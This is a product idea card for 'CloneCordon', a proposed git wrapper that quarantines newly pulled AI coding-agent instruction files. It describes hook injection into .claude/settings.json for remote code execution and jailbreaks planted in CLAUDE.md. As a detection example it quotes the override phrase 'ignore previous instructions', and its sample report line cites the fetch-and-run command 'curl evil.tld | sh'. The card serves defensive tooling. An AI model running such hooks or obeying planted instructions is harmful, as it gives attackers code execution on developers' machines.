L
← May 2026
App Idea Cards 2026-05-19

CloneCordon

CloneCordon

CloneCordon

A local-first git wrapper that quarantines newly-introduced AI agent instruction files — CLAUDE.md, .claude/settings.json, .claude/agents/, .cursor/rules, AGENTS.md, .github/copilot-instructions.md, .windsurf/ — the moment they land in your working tree, and shows you a plain-English diff of what your agent would do differently before you choose to let it.

Problem

When you git clone or git pull a repo, your coding agent immediately reads any agent-instruction files in the tree without showing you what's in them — and any one of those files can contain hidden hooks, custom slash commands, sub-agent prompts, or natural-language jailbreaks that fire on the next agent launch. Check Point Research's CVE-2025-59536 disclosure (Feb 25, 2026, CVSS 8.7) showed attackers injecting malicious hooks into a repo's .claude/settings.json to get remote code execution on the dev's machine the moment Claude Code started up, and the OX Security MCP advisory in May 2026 estimated up to 200,000 vulnerable agent-config surfaces on developer laptops worldwide. Today there is no tool that sits at the git boundary, inspects every agent-readable file in a freshly pulled diff, and gives the developer a veto before the agent inherits the change.

Target user

Individual developers using Claude Code, Cursor, Windsurf, Gemini-CLI, or Copilot agent-mode against repos they don't fully control — open-source maintainers triaging PRs, contractors switching between client repos in the same hour, anyone running git clone on an unfamiliar repo and immediately launching an agent inside it. Secondary: AppSec / DevSecOps leads at small-to-midsize shops who want a managed default for their engineering teams. JTBD: "Before any AI coding agent on this machine acts on a freshly pulled repo, show me the agent-readable instructions it just inherited and let me approve, quarantine, or strip them."

MVP scope

  • A drop-in git wrapper (cordon git ...) plus optional post-checkout / post-merge / post-rewrite git hooks that fire after every state-changing git operation and exit non-zero until the developer reviews newly-introduced agent-instruction files.
  • Walks the working tree for a known taxonomy of agent-readable files: CLAUDE.md, AGENTS.md, .claude/settings.json, .claude/settings.local.json, .claude/agents/**, .claude/commands/**, .claude/hooks/**, .cursor/rules, .cursorrules, .cursor/mcp.json, .windsurf/**, .continue/config.json, .github/copilot-instructions.md, plus the same set under any subdirectory or submodule.
  • AST-aware diff of .claude/settings.json-style files (new hooks, new shell commands, new allowed-tools grants, new MCP server entries) and a plain-text diff with imperative-natural-language detection for CLAUDE.md / AGENTS.md files ("ignore previous instructions", "always grant", base64 blobs, hidden Unicode tag characters).
  • One-screen TUI with a 0–100 risk score per file (weighted on whether a hook executes a shell, whether new permissions or tools are granted, whether the diff contains directive natural language, whether the file appears for the first time vs. a known prior version) and Approve / Quarantine / Strip actions per row.
  • Quarantine writes the file path into a .cordon-ignore deny-list and surfaces wrapper launchers (cordon claude, cordon cursor, cordon windsurf) that mount the deny-list as a read-only overlay so the agent literally cannot read the file until it is approved. Approvals commit to .cordon-trust.json and travel with the repo.
  • Outputs the same review as a SARIF report (for GitHub code scanning) and a JUnit XML (for CI), plus a copy-pastable plain-English PR-comment summary ("this PR added a Stop hook that runs bash -c 'curl evil.tld | sh'"). Single static Go binary, no Node / Python runtime required.

Monetization

Freemium. CloneCordon CLI is MIT-licensed and free forever. CloneCordon Cloud at $10/seat/month or $69/month team flat continuously watches every public repo your team pinned and pushes a webhook the moment ANY watched repo merges a change to one of its agent-instruction files — so the team is paged before the next git pull. Enterprise ($499/month flat for ≤50 seats) adds SAML SSO, an org-wide policy file (CORDON_POLICY.yaml), audit-log export, a private signature mirror, and team-shared approval lists.

Why now

CVE-2025-59536 (Check Point Research, Feb 25, 2026, CVSS 8.7) confirmed that .claude/settings.json hook injection is a working RCE primitive against Claude Code, and the OX Security MCP advisory in May 2026 exposed up to 200,000 vulnerable agent-config instances across IDEs, internal tools, and cloud services with more than 30 CVEs filed against MCP servers, clients, and infrastructure in the prior 60 days. Anthropic, Cursor, and the GitHub MCP team have publicly framed sanitization as "the developer's responsibility," which means the only place the fix can live is on the developer's machine at the git-checkout boundary — exactly where existing tools (gitleaks, semgrep, Snyk) don't reach because none of them know what a .claude/settings.json is. [[mcp-frisk]] covers MCP-server launch surfaces and [[hookgate]] covers npm lifecycle-script supply chain, but neither sees the broader agent-instruction set that fires on every prompt submit; [[agent-leash]] governs browser-resident agents, not coding agents in a repo.

Risks & open questions

  • False-positive rate on natural-language directive detection — a legitimate CLAUDE.md is supposed to contain imperative instructions; calibration without crying wolf is the work, and a too-noisy default will train developers to click "approve all" reflexively.
  • Wrapper friction: developers will route around cordon git the second it adds latency to a hot loop, so the hook path must be sub-second on a 200k-file monorepo and the Approve action must be one keystroke.
  • Demand-side: how many developers feel the pain enough to install yet another git wrapper before the next published RCE forces the issue? The Cloud tier exists to monetize teams that have already adopted; the wedge is whether the free CLI gets to 10k weekly active before that team conversion can start.
  • Cross-platform parity: Windows file-watching, path normalization, and overlay-mount semantics are historically painful; a Go binary helps but a cordon cursor overlay that works on Windows is a non-trivial build before claiming GA.
  • Coverage half-life: every new coding agent ships a new instruction-file convention (Roo Code, Aider, Continue, the next IDE), so the taxonomy is a maintenance treadmill — needs a community-contributed signature feed and a fast OTA update channel.

Next step

Build a 48-hour Go proof-of-concept: implement the cordon git pull wrapper and the post-merge / post-checkout git hooks, the AST-aware diff for .claude/settings.json hooks plus the imperative-natural-language detector for CLAUDE.md, and a Bubble Tea TUI with Approve / Quarantine / Strip per row. Provide a fixture repo containing a malicious .claude/settings.json and a CLAUDE.md jailbreak; ship green only if both fixtures land at risk score ≥ 80 and the wrapper round-trips under 300 ms on a 50k-file repo. If that lands, promote to weekly prototype.

Sources

More from App Idea Cards

CheckoutClear
CheckoutClear
2026-06-23
SkillSync
SkillSync
2026-06-18
VibeGuard
VibeGuard
2026-06-16
ExtDrift
ExtDrift
2026-06-11
TransferPulse
TransferPulse
2026-06-10
BenchShift
BenchShift
2026-06-08
OtelGenLint
OtelGenLint
2026-06-07
CreditCadence
CreditCadence
2026-06-06
LoanPivot
LoanPivot
2026-06-06
PurgeProof
PurgeProof
2026-06-04
ToolCull
ToolCull
2026-06-03
PromptFence
PromptFence
2026-06-02